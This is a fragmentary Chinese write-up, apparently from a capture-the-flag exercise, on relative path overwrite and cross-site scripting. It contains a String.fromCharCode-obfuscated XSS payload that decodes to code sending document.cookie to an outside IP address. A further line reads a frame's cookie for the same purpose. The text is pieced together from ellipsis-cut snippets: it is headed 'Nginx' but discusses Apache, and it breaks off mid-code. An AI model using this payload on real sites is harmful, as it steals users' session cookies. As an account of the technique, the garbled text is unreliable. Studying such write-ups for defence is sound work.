Nginx
url及返回结果
http://127.0.0.1/rpo/yang/index.php #页面返回正常
http://127.0.0.1/rpo/yang%2findex.php...Apache不会将'%2f'作为'/'处理,所以执行的结果就是去rpo目录下寻找名为yang%2findex.php的文件,显然服务器并没有yang%2findex.php该文件,所以显示not found...- 等待回显。
因为对引号过滤,所以使用String.fromCharCode(解ascii码)来绕过过滤。...110,101,119,32,73,109,97,103,101,40,41,46,115,114,99,61,34,104,116,116,112,58,47,47,49,53,48,46,57,53,46,49,55,52,46,50,52,53,58,56,56,56,56,63,97,61,34,43,101,110,99,111,100,101,85,82,73,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59));
收到回显...a="+document.getElementById("frame").contentWindow.document.cookie;
}
提交后收到回显
?
结束!